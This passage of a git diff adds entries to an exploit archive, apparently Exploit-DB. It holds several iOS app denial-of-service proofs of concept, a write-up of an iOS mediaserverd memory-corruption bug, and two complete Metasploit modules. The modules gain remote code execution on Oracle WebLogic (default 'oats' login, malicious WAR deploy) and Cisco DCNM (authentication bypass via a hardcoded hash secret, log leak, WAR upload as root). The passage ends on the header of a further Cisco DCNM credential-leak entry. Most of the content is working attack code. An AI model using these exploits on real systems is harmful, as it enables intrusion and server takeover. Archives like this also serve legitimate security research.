+# 4.- Host List > "+"
+# 5.- Add Host
+# 6.- Address Type "IP Address"
+# 7.- Host IP Address "192.168.1.1"
+# 8.- User Name "l4m5"
+# 9.- Paste ClipBoard on "Password"
+# 10.- Add
+# 11.- Connect
+# 12.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 2500
+print (buffer)
\ No newline at end of file
diff --git a/exploits/ios/dos/47678.py b/exploits/ios/dos/47678.py
new file mode 100755
index 000000000..73cacde59
--- /dev/null
+++ b/exploits/ios/dos/47678.py
@@ -0,0 +1,24 @@
+# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-18
+# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
+# Software Link: App Store for iOS devices
+# Tested Version: 1.1.4.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 13.2
+
+# Steps to Produce the Crash:
+# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
+# 2.- Copy content to clipboard
+# 3.- Open "scadaApp for iOS"
+# 4.- Let's go
+# 5.- Username > "l4m5"
+# 6.- Password > "l4m5"
+# 7.- Paste ClipBoard on "Servername"
+# 8.- Login
+# 9.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 257
+print (buffer)
\ No newline at end of file
diff --git a/exploits/ios/dos/47694.txt b/exploits/ios/dos/47694.txt
new file mode 100644
index 000000000..3537d13c4
--- /dev/null
+++ b/exploits/ios/dos/47694.txt
@@ -0,0 +1,55 @@
+mediaserverd has various media parsing responsibilities; its reachable from various sandboxes
+and is able to talk to interesting kernel drivers so is a valid target in an exploit chain.
+
+One of the services it vends is com.apple.audio.AudioFileServer, a fairly simple XPC service
+which will parse audio files on behalf of clients and send them the raw bytes.
+
+Files are opened via their ipod-library:// URL; for the purposes of this PoC you will need to
+ensure there is at least one audio file in the iTunes library
+(I've used one of my highschool band's MP3s, available on request, it's not that bad!)
+
+The files are actually parsed by the AudioFileReadPacketData method; here's the prototype from the docs:
+
+OSStatus AudioFileReadPacketData(AudioFileID inAudioFile,
+                                 Boolean inUseCache,
+                                 UInt32 *ioNumBytes,
+                                 AudioStreamPacketDescription *outPacketDescriptions,
+                                 SInt64 inStartingPacket,
+                                 UInt32 *ioNumPackets,
+                                 void *outBuffer);
+
+The docs tell us the meaning of the ioNumBytes and outBuffer arguments:
+
+ioNumBytes
+On input, the size of the outBuffer parameter, in bytes. On output, the number of bytes actually read.
+
+outBuffer
+Memory that you allocate to hold the read packets. Determine an appropriate size by multiplying
+the number of packets requested (in the ioNumPackets parameter) by the typical packet size
+for the audio data in the file. For uncompressed audio formats, a packet is equal to a frame.
+
+For the purposes of the bug this function has memcpy semantics; the value pointed to
+by ioNumBytes will be considered the correct size of the output buffer;
+AudioFileReadPacketData will be unable to verify that; it's up to the caller.
+
+Looking at the code which calls this the values are derived from three values passed
+in the 'read' xpc message:
+
+numbytes (uint64), numpackets (uint64), startingPacket (int64)
+
+Those values are truncated to 32 bits then passed through a few layers of function calls during which
+various integer overflow occur when they're multiplied and added (there are no checks anywhere.)
+
+You eventually end up in a curious allocation routine which is able to allocate three different types of
+shared memory using either mach memory entries, posix shm or xpc_shmem. This service uses posix_shm,
+the PoC should cause mediaserverd to shm_truncate and mmap a 0x4000 byte region,
+then attempt to write significantly more bytes there.
+
+In the debug_output.txt file you can see the debug output and crash log demonstrating that audio data has clearly
+corrupted an object and caused a pointer to be overwritten with audio data.
+
+Tested on iOS 12.4 (16G77) on iPod touch 6G
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47694.zip
\ No newline at end of file
diff --git a/exploits/ios/dos/47716.py b/exploits/ios/dos/47716.py
new file mode 100755
index 000000000..f55a313f0
--- /dev/null
+++ b/exploits/ios/dos/47716.py
@@ -0,0 +1,25 @@
+# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019-11-25
+# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
+# Software Link: App Store for iOS devices
+# Tested Version: 8.20
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.2
+
+# Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as 
+# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.
+# Steps to Produce the Crash:
+
+# 1.- Run python code: iNetTools.py
+# 2.- Copy content to clipboard
+# 3.- Open "iNetTools for iOS"
+# 4.- Go to "Whois"
+# 5.- Paste ClipBoard on "Domain Name"
+# 6.- Start
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 98
+print (buffer)
\ No newline at end of file
diff --git a/exploits/ios/dos/47721.py b/exploits/ios/dos/47721.py
new file mode 100755
index 000000000..7eb12cb1b
--- /dev/null
+++ b/exploits/ios/dos/47721.py
@@ -0,0 +1,30 @@
+# Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019-11-27
+# Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963
+# Software Link: App Store for iOS devices
+# Tested Version: 1.2 
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.2.3
+
+# Summary: With GHIA CamIP you can view your cameras in real time supports conventional IPC cameras, 
+# cameras with alarm, Video intercom and other devices. 
+
+
+# Steps to Produce the Crash:
+# 1.- Run python code: GHIA.py
+# 2.- Copy content to clipboard
+# 3.- Open "GHIA CamIP for iOS"
+# 4.- Go to "Add"
+# 5.- Wireless Settings
+# 6.- Connect to the internet
+# 7.- Paste Clipboard on "Password"
+# 8.- WiFi Connection
+# 9.- Start setting
+# 10- Crashed
+
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 33
+print (buffer)
\ No newline at end of file
diff --git a/exploits/ios/dos/47993.py b/exploits/ios/dos/47993.py
new file mode 100755
index 000000000..586005dbc
--- /dev/null
+++ b/exploits/ios/dos/47993.py
@@ -0,0 +1,29 @@
+# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2020-02-02
+# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207
+# Software Link: App Store for iOS devices
+# Tested Version: 10.4.1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.3
+
+# Summary: P2PWIFICAM is a matching network camera P2P (point to point) monitoring software.
+# Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex, 
+# truly plug and play!
+
+# Steps to Produce the Crash:
+
+# 1.- Run python code: P2PWIFICAM.py
+# 2.- Copy content to clipboard
+# 3.- Open "P2PWIFICAM" for Ios
+# 4.- Go to "Add" (Touch here to add a camera)
+# 5.- Go to "Input Camera"
+# 6.- Paste Clipboard on "Camera ID" 
+# 7.- Paste Clipboard on "Password" 
+# 9.- Ok
+# 10- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 257
+print (buffer)
\ No newline at end of file
diff --git a/exploits/ios/dos/48236.py b/exploits/ios/dos/48236.py
new file mode 100755
index 000000000..f73e3d2dd
--- /dev/null
+++ b/exploits/ios/dos/48236.py
@@ -0,0 +1,24 @@
+# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
+# Author: Ivan Marmolejo
+# Date: 2020-03-22
+# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
+# Software Link: App Store for iOS devices
+# Tested Version: 5.0.25920
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.3
+
+Steps to Produce the Crash:
+1.- Run python code: ProficySCADA.py
+2.- Copy content to clipboard
+3.- Open "ProficySCADA for iOS"
+4.- Add
+5.- Username --> admin
+6.- Paste ClipBoard on "Password"
+7.- Add
+8.- Connect
+9.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 257
+print (buffer)
\ No newline at end of file
diff --git a/exploits/java/remote/46942.rb b/exploits/java/remote/46942.rb
new file mode 100755
index 000000000..045700c08
--- /dev/null
+++ b/exploits/java/remote/46942.rb
@@ -0,0 +1,398 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
+      'Description'    => %q{
+        This module abuses a feature in WebLogic Server's Administration Console to install
+        a malicious Java application in order to gain remote code execution. Authentication
+        is required, however by default, Oracle ships with a "oats" account that you could
+        log in with, which grants you administrator access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Steven Seeley', # Used the trick and told me about it
+          'sinn3r'         # Metasploit module
+        ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'WebLogic Server Administration Console 12 or prior', { } ]
+        ],
+      'References'     =>
+        [
+          # The CVE description matches what this exploit is doing, but it was for version
+          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
+          # ['CVE', '2007-2699']
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8088
+        },
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 13 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
+        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
+        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
+      ])
+  end
+
+  class LoginSpec
+    attr_accessor :admin_console_session
+  end
+
+  def login_spec
+    @login_spec ||= LoginSpec.new
+  end
+
+  class OatsWarPayload < MetasploitModule
+    attr_reader :name
+    attr_reader :war
+
+    def initialize(payload)
+      @name = [Faker::App.name, Rex::Text.rand_name].sample
+      @war = payload.encoded_war(app_name: name).to_s
+    end
+  end
+
+  def default_oats_path
+    datastore['DefaultOatsPath']
+  end
+
+  def war_payload
+    @war_payload ||= OatsWarPayload.new(payload)
+  end
+
+  def set_frsc
+    value = get_deploy_frsc
+    @frsc = value
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    })
+
+    if res && res.body.include?('Oracle WebLogic Server Administration Console')
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def set_admin_console_session(res)
+    cookie = res.get_cookies
+    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
+    vprint_status("Token for console session is: #{admin_console_session}")
+    login_spec.admin_console_session = admin_console_session
+  end
+
+  def is_logged_in?(res)
+    html = res.get_html_document
+    a_element = html.at('a')
+    if a_element.respond_to?(:attributes) && a_element.attributes['href']
+      link = a_element.attributes['href'].value
+      return URI(link).request_uri == '/console'
+    end
+
+    false
+  end
+
+  def do_login
+    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    fail_with(Failure::Unknown, 'No response from server') unless res
+    set_admin_console_session(res)
+
+    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_post' =>
+        {
+          'j_username'           => datastore['OATSUSERNAME'],
+          'j_password'           => datastore['OATSPASSWORD'],
+          'j_character_encoding' => 'UTF-8'
+        }
+    })
+
+    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
+    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
+    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
+    set_admin_console_session(res)
+  end
+
+  def get_deploy_frsc
+    # First we are just going through the pages in a specific order to get the FRSC value
+    # we need to prepare uploading the WAR file.
+    res = nil
+    requests =
+      [
+        { path: 'console/', vars: {} },
+        { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
+        { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
+      ]
+
+    requests.each do |req|
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, req[:path]),
+        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+        'vars_get' => req[:vars]
+      })
+
+      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
+    end
+
+    html = res.get_html_document
+    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
+    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
+    frsc_attr ? frsc_attr.value : ''
+  end
+
+  def do_select_upload_action
+    action = '/com/bea/console/actions/app/install/selectUploadApp'
+    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get'  =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortletselectedAppPath' => app_path,
+          'AppApplicationInstallPortletfrsc' => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+  end
+
+  def do_upload_app_action
+    action = '/com/bea/console/actions/app/install/uploadApp'
+    ctype = 'application/octet-stream'
+    app_cname = 'AppApplicationInstallPortletuploadAppPath'
+    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
+    frsc_cname = 'AppApplicationInstallPortletfrsc'
+    war = war_payload.war
+    war_name = war_payload.name
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
+    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
+    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
+       'data'    => post_data.to_s
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+    print_response_message(res)
+  end
+
+  def do_app_select_action
+    action = '/com/bea/console/actions/app/install/appSelected'
+    war_name = war_payload.name
+    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortletselectedAppPath' => app_path,
+          'AppApplicationInstallPortletfrsc'            => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+    print_response_message(res)
+  end
+
+  def do_style_select_action
+    action = '/com/bea/console/actions/app/install/targetStyleSelected'
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortlettargetStyle' => 'Application',
+          'AppApplicationInstallPortletfrsc'        => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+  end
+
+  def do_finish_action
+    action = '/com/bea/console/actions/app/install/finish'
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortletname'             => war_payload.name,
+          'AppApplicationInstallPortletsecurityModel'    => 'DDOnly',
+          'AppApplicationInstallPortletstagingStyle'     => 'Default',
+          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
+          'AppApplicationInstallPortletfrsc'             => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+    print_response_message(res)
+
+    # 302 is a good enough indicator of a successful upload, otherwise
+    # the server would actually return a 200 with an error message.
+    res.code == 302
+  end
+
+  def print_response_message(res)
+    html = res.get_html_document
+    message_div = html.at('div[@class="message"]')
+    if message_div
+      msg = message_div.at('span').text
+      print_status("Server replies: #{msg.inspect}")
+    end
+  end
+
+  def deploy_war
+    set_frsc
+    print_status("FRSC value: #{frsc}")
+    do_select_upload_action
+    do_upload_app_action
+    do_app_select_action
+    do_style_select_action
+    do_finish_action
+  end
+
+  def goto_war(name)
+    print_good("Operation \"#{name}\" is a go!")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, name)
+    })
+
+    print_status("Code #{res.code} on \"#{name}\" request") if res
+  end
+
+  def undeploy_war
+    war_name = war_payload.name
+    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
+    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
+          'AppDeploymentsControlPortlethandle' => handle
+        },
+      'vars_post' =>
+        {
+          # For some reason, the value given to the server is escapped twice.
+          # The Metasploit API should do it at least once.
+          'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
+          '_pageLabel' => 'AppApplicationUninstallPage',
+          '_nfpb'      => 'true',
+          'AppApplicationUninstallPortletfrsc' => frsc
+        }
+    })
+
+    if res && res.code == 302
+      print_good("Successfully undeployed #{war_name}.war")
+    else
+      print_warning("Unable to successfully undeploy #{war_name}.war")
+      print_warning('You may want to do so manually.')
+    end
+  end
+
+  def cleanup
+    undeploy_war if is_cleanup_ready
+    super
+  end
+
+  def setup
+    @is_cleanup_ready = false
+    super
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Detected
+      print_status('Target does not have the login page we are looking for.')
+      return
+    end
+
+    do_login
+    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
+    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
+    result = deploy_war
+    if result
+      @is_cleanup_ready = true
+      goto_war(war_payload.name)
+    end
+  end
+
+  attr_reader :frsc
+  attr_reader :is_cleanup_ready
+end
\ No newline at end of file
diff --git a/exploits/java/remote/47347.rb b/exploits/java/remote/47347.rb
new file mode 100755
index 000000000..d1d930f6f
--- /dev/null
+++ b/exploits/java/remote/47347.rb
@@ -0,0 +1,280 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
+      'Description'    => %q{
+        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
+        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
+        directory and achieve remote code execution as root.
+        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
+        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
+        directory for the WAR file upload.
+        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
+        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
+        (see References to understand why).
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2019-1619' ], # auth bypass
+          [ 'CVE', '2019-1620' ], # file upload
+          [ 'CVE', '2019-1622' ], # log download
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
+        ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [
+            'Cisco DCNM 11.1(1)', {}
+          ],
+          [
+            'Cisco DCNM 11.0(1)', {}
+          ],
+          [
+            'Cisco DCNM 10.4(2)', {}
+          ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' => { 'WfsDelay' => 10 },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 26 2019'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Connect with TLS', true]),
+        OptString.new('TARGETURI', [true,  "Default server path", '/']),
+        OptString.new('USERNAME', [true,  "Username for auth (required only for 11.0(1) and above", 'admin']),
+        OptString.new('PASSWORD', [true,  "Password for auth (required only for 11.0(1) and above", 'admin']),
+      ])
+  end
+
+  def check
+    # at the moment this is the best way to detect
+    # check if pmreport and fileUpload servlets return a 500 error with no params
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
+      'vars_get'  =>
+      {
+        'token'  => rand_text_alpha(5..20)
+      },
+      'method' => 'GET'
+    )
+    if res && res.code == 500
+      res = send_request_cgi(
+        'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
+        'method' => 'GET',
+      )
+      if res && res.code == 500
+        return CheckCode::Detected
+      end
+    end
+
+    CheckCode::Unknown
+  end
+
+  def target_select
+    if target != targets[0]
+      return target
+    else
+      res = send_request_cgi(
+        'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'),
+        'method' => 'GET'
+      )
+      if res && res.code == 200
+        if res.body.include?('version":"11.1(1)')
+          print_good("#{peer} - Detected DCNM 11.1(1)")
+          print_status("#{peer} - No authentication required, ready to exploit!")
+          return targets[1]
+        elsif res.body.include?('version":"11.0(1)')
+          print_good("#{peer} - Detected DCNM 11.0(1)")
+          print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
+          return targets[2]
+        elsif res.body.include?('version":"10.4(2)')
+          print_good("#{peer} - Detected DCNM 10.4(2)")
+          print_status("#{peer} - No authentication required, ready to exploit!")
+          return targets[3]
+        else
+          print_error("#{peer} - Failed to detect target version.")
+          print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
+          print_error(res.body)
+          print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
+          return targets[3]
+        end
+      end
+      fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
+    end
+  end
+
+  def auth_v11
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, 'fm/'),
+      'method' => 'GET',
+      'vars_get'  =>
+      {
+        'userName'  => datastore['USERNAME'],
+        'password'  => datastore['PASSWORD']
+      },
+    )
+
+    if res && res.code == 200
+      # get the JSESSIONID cookie
+      if res.get_cookies
+        res.get_cookies.split(';').each do |cok|
+          if cok.include?("JSESSIONID")
+            return cok
+          end
+        end
+      end
+    end
+  end
+
+  def auth_v10
+    # step 1: get a JSESSIONID cookie and the server Date header
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, 'fm/'),
+      'method' => 'GET'
+    )
+
+    # step 2: convert the Date header and create the auth hash
+    if res && res.headers['Date']
+      jsession = res.get_cookies.split(';')[0]
+      date = Time.httpdate(res.headers['Date'])
+      server_date = date.strftime("%s").to_i * 1000
+      print_good("#{peer} - Got sysTime value #{server_date.to_s}")
+
+      # auth hash format:
+      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
+      session_id = rand(1000..50000).to_s
+      md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
+        "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
+      md5_str = Base64.strict_encode64(md5)
+
+      # step 3: authenticate our cookie as admin
+      # token format: sessionId.sysTime.md5_str.username
+      res = send_request_cgi(
+        'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
+        'cookie' => jsession,
+        'vars_get'  =>
+        {
+          'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
+        },
+        'method' => 'GET'
+      )
+
+      if res && res.code == 500
+        return jsession
+      end
+    end
+  end
+
+  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
+  def get_war_path
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
+      'method' => 'GET'
+    )
+
+    if res && res.code == 200
+      tmp = Tempfile.new
+      # we have to drop this into a file first
+      # else we will get a Zip::GPFBit3Error if we use an InputStream
+      File.binwrite(tmp, res.body)
+      Zip::File.open(tmp) do |zis|
+        zis.each do |entry|
+          if entry.name =~ /jboss[0-9]*\.log/
+            fdata = zis.read(entry)
+            if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
+              tmp.close
+              tmp.unlink
+              return $1.strip
+            end
+          end
+        end
+      end
+    end
+  end
+
+
+  def exploit
+    target = target_select
+
+    if target == targets[2]
+      jsession = auth_v11
+    elsif target == targets[3]
+      jsession = auth_v10
+    end
+
+    # targets[1] DCNM 11.1(1) doesn't need auth!
+    if jsession.nil? && target != targets[1]
+      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
+    elsif target != targets[1]
+      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
+    end
+
+    war_path = get_war_path
+    if war_path.nil? or war_path.empty?
+      fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
+    else
+      print_good("#{peer} - Obtain WAR path from logs: #{war_path}")
+    end
+
+    # Generate our payload... and upload it
+    app_base = rand_text_alphanumeric(6..16)
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+    fname = app_base + '.war'
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
+    post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
+    post_data.add_part(war_payload,
+                       "application/octet-stream", 'binary',
+                       "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
+    data = post_data.to_s
+
+    print_status("#{peer} - Uploading payload...")
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
+      'method' => 'POST',
+      'data'   => data,
+      'cookie' => jsession,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    if res && res.code == 200 && res.body[/#{fname}/]
+      print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")
+
+      sleep 10
+
+      print_status("#{peer} - Executing payload...")
+      send_request_cgi(
+        'uri'    => normalize_uri(target_uri.path, app_base),
+        'method' => 'GET'
+      )
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/java/remote/47885.txt b/exploits/java/remote/47885.txt
new file mode 100644
index 000000000..968d90bdb
--- /dev/null
+++ b/exploits/java/remote/47885.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
+# Date: 2020-01-06
+# Exploit Author: Harrison Neal
+# Vendor Homepage: https://www.cisco.com/
